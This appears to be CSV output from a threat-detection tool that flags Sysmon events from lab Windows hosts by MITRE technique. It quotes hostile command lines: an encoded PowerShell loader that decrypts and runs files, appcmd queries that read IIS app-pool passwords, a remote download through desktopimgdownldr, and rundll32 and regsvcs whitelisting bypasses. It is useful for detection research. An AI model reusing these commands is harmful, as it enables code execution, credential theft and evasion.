JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5260 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:17:52.899 + 365ABB72-AB70-5C8E-0000-0010781D0A00 + 3272 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" + C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-A965-5C8E-0000-0010D9100400 + 3884 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5919 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.232 + 365ABB72-3D6E-5CEB-0000-00108C8EFF00 + 3144 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 305352 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-03 08:47:20.001 + 747F3D96-F098-5EFE-0000-001012E13801 + 1932 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-1CE4-5EFE-0000-0020CC9C0800 + 0x89ccc + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-EF3D-5EFE-0000-0010F3653401 + 5384 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 7649 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.577 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.13 + IEWIN7 + 49159 + + false + 10.0.2.18 + + 4443 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4917 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.222 + 747F3D96-6628-5D3F-0000-001062788800 + 2040 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5916 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.161 + 365ABB72-3D6E-5CEB-0000-0010CC8AFF00 + 2524 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUA